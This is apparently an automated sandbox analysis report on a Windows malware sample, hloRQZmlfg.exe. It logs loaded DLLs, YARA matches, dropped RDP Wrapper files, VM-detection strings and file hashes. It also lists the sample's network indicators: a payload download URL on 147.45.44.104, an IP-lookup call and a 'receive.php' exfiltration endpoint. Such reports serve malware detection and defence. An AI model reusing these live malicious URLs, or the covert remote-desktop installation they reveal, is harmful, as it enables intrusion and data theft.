Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlanapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wshelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: peerdistsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wcmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mobilenetworking.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprmsg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samlib.dll	Jump to behavior

Source: Yara match	File source: hloRQZmlfg.exe, type: SAMPLE
Source: Yara match	File source: 0.0.hloRQZmlfg.exe.880000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1405997855.0000000000882000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1919966763.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: hloRQZmlfg.exe PID: 2444, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Code function: 8_2_004430DC push 00443161h; ret	8_2_00443159
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Code function: 8_2_00439674 push ecx; mov dword ptr [esp], ecx	8_2_00439675
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Code function: 8_2_00420164 push 004201DAh; ret	8_2_004201D2
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Code function: 8_2_0040A178 push 0040A1E7h; ret	8_2_0040A1DF
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Code function: 8_2_00437134 push 00437201h; ret	8_2_004371F9
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Code function: 8_2_00443188 push 00443230h; ret	8_2_00443228
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Code function: 8_2_0043421C push ecx; mov dword ptr [esp], edx	8_2_0043421E
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Code function: 8_2_0044323C push 004432C7h; ret	8_2_004432BF
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Code function: 8_2_00437298 push 0043732Eh; ret	8_2_00437326
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Code function: 8_2_00437360 push 004373ADh; ret	8_2_004373A5
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Code function: 8_2_0043A3F8 push 0043A450h; ret	8_2_0043A448
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Code function: 8_2_004176D4 push 00417879h; ret	8_2_00417871
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Code function: 8_2_00421998 push 004219E5h; ret	8_2_004219DD
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Code function: 8_2_0042AA70 push ecx; mov dword ptr [esp], edx	8_2_0042AA75
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Code function: 8_2_0040CA10 push eax; retf 0040h	8_2_0040CA11
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Code function: 8_2_0042AAB4 push ecx; mov dword ptr [esp], edx	8_2_0042AAB9
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Code function: 8_2_00415C58 push ecx; mov dword ptr [esp], edx	8_2_00415C5D
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Code function: 8_2_0040EC80 push ecx; mov dword ptr [esp], ecx	8_2_0040EC85
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Code function: 8_2_00404E0C push eax; ret	8_2_00404E48
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Code function: 8_2_0043FE8C push 0043FEE0h; ret	8_2_0043FED8

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	File created: C:\Program Files\RDP Wrapper\rdpwrap.dll	Jump to dropped file
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	File created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	File created: C:\Windows\System32\rfxvmt.dll	Jump to dropped file

Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Memory allocated: 2AD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Memory allocated: 2CF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Memory allocated: 2B00000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Window / User API: threadDelayed 7636			Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Window / User API: threadDelayed 2338			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Dropped PE file which has not been started: C:\Program Files\RDP Wrapper\rdpwrap.dll			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Dropped PE file which has not been started: C:\Windows\System32\rfxvmt.dll			Jump to dropped file

Source: C:\Users\user\Desktop\hloRQZmlfg.exe TID: 6212	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe TID: 4524	Thread sleep count: 7636 > 30	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe TID: 4524	Thread sleep count: 2338 > 30	Jump to behavior

Source: Amcache.hve.38.dr	Binary or memory string: VMware
Source: Amcache.hve.38.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.38.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.38.dr	Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
Source: Amcache.hve.38.dr	Binary or memory string: VMware, Inc.
Source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002D9F000.00000004.00000800.00020000.00000000.sdmp, hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DAD000.00000004.00000800.00020000.00000000.sdmp, net1.exe, 0000001C.00000002.1770023496.0000000003208000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: *Hyper-V Administrators
Source: Amcache.hve.38.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.38.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.38.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.38.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.38.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.38.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.38.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: hloRQZmlfg.exe, 00000000.00000002.1919496760.0000000000F5D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
Source: Amcache.hve.38.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: net1.exe, 0000001C.00000002.1770023496.0000000003208000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Administrators
Source: Amcache.hve.38.dr	Binary or memory string: vmci.sys
Source: net1.exe, 0000001C.00000002.1770023496.0000000003208000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Administrators9+h
Source: Amcache.hve.38.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.38.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.38.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.38.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.38.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.38.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.38.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.38.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.38.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.38.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.38.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.38.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.38.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.38.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.38.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Process token adjusted: Debug			Jump to behavior

Windows Analysis Report hloRQZmlfg.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
hloRQZmlfg.exe

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Code function: GetUserDefaultUILanguage,GetLocaleInfoW,	8_2_004093C0
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	8_2_00408908
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Code function: GetLocaleInfoW,	8_2_00412C4A
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Code function: GetLocaleInfoW,	8_2_00412C4C
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Code function: GetLocaleInfoW,	8_2_00412C98

Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Queries volume information: C:\Users\user\Desktop\hloRQZmlfg.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: Amcache.hve.38.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.38.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.38.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.38.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.38.dr	Binary or memory string: MsMpEng.exe

IP	Domain	Country	ASN	ASN Name	Malicious
104.26.12.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
8.46.123.33	unknown	United States	62713	AS-PUBMATICUS	true
188.114.96.3	hansgborn.eu	European Union	13335	CLOUDFLARENETUS	false
147.45.44.104	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	false

Name	Malicious	Antivirus Detection	Reputation
http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe	false	23%, Virustotal, Browse	unknown
http://api.ipify.org/	false	0%, Virustotal, Browse	unknown
https://hansgborn.eu/receive.php	false	0%, Virustotal, Browse	unknown

ID:	1528586
Product:	CloudBasic
Start time:	03:22:08
Start date:	08.10.2024
Sample:	hloRQZmlfg.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	cee4e023e6afaaa51f600caec3469215
SHA1:	bf2ceff1f19f09a70863d1f8c7be0fa9662b3b04
SHA256:	da52143dd6a13c1ea3e24e735f64938830e2a3160ae08989629a43e5020d1173
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Name	Type	MD5	SHA1	SHA256
C:\Program Files\RDP Wrapper\rdpwrap.dll	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	461ADE40B800AE80A40985594E1AC236	B3892EEF846C044A2B0785D54A432B3E93A968C8	798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
C:\Program Files\RDP Wrapper\rdpwrap.ini	Generic INItialization configuration [SLPolicy]	92BC5FEDB559357AA69D516A628F45DC	6468A9FA0271724E70243EAB49D200F457D3D554	85CD5CD634FA8BBBF8D71B0A7D49A58870EF760DA6D6E7789452CAE4CAB28127
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_hloRQZmlfg.exe_e14f1ae934bde6c6503b1e1bfaf2ffefa86c324_8c8de2e2_89409a0e-f3ad-4606-acec-29704ed3c812\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	C557E311E2DE95A575477C498BA9AD12	8942E4F3747DC39DB0959D5AFD1252F87877C1A8	2E924038991D81C873776C3A9C6DAB5FD94EA3D60E24415C63271CAE6196C3EE
C:\ProgramData\Microsoft\Windows\WER\Temp\WER91CD.tmp.dmp	Mini DuMP crash report, 15 streams, Tue Oct 8 01:23:44 2024, 0x1205a4 type	0A6687B45E85F7A0CDCE28AB7018ADEB	BD857779DEE2B40E4D6ECDE60A08E4650455F9B8	FC484CA4F873C983E2A2EB280D1F50CE29CF609EEBEFEB261BEEC22B0EAD4B9C
C:\ProgramData\Microsoft\Windows\WER\Temp\WER93C2.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	2C0BCCD2941556161A66FF1C6E08DD58	3CC4BED02D8B5D8B207AACCBBEBA68523A1FD520	96E2E52D23EC84EBAE80BD5A0CD406162130687899D9708708DAF7150FCCA945
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9597.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	3E6317D8E4B0B87DB73DE3C52437BEFB	CE0B76533BBE3613DA1EA5383057CBEE40CE631B	518EB8F48B09A51E15C54BD91B9F5AC53DC49292070EA9990CD29DBB13223D12
C:\Users\user\AppData\Local\Temp\RDPWInst.exe	PE32 executable (console) Intel 80386, for MS Windows	C213162C86BB943BCDF91B3DF381D2F6	8EC200E2D836354A62F16CDB3EED4BB760165425	AC91B2A2DB1909A2C166E243391846AD8D9EDE2C6FCFD33B60ACF599E48F9AFC
C:\Windows\System32\rfxvmt.dll	PE32+ executable (DLL) (console) x86-64, for MS Windows	E3E4492E2C871F65B5CEA8F1A14164E2	81D4AD81A92177C2116C5589609A9A08A5CCD0F2	32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
C:\Windows\appcompat\Programs\Amcache.hve	MS Windows registry file, NT/2000 or above	F1BCE4A5C7DE908DD5EA74859846AD43	4EA8D14E89BB9E1E37521B1316618D22CE93533B	319A7DCBB18A1205BA5E5D3287D3D40D2D90CDF11C75CCD3E7B892BBC5C22A70
\Device\ConDrv	ASCII text, with CRLF line terminators	F1CA165C0DA831C9A17D08C4DECBD114	D750F8260312A40968458169B496C40DACC751CA	ACCF036232D2570796BF0ABF71FFE342DC35E2F07B12041FE739D44A06F36AF8
\Device\Mup\226546*\MAILSLOT\NET\NETLOGON	data	938C00D0FDB2EDAA0B021147CADE0D31	EC80E5D071694E592A3A60A2EAED203C131B226E	45BC0D458DCDA1394EF04E4AEC88737F8B7E09675706523439FC847C3EA98985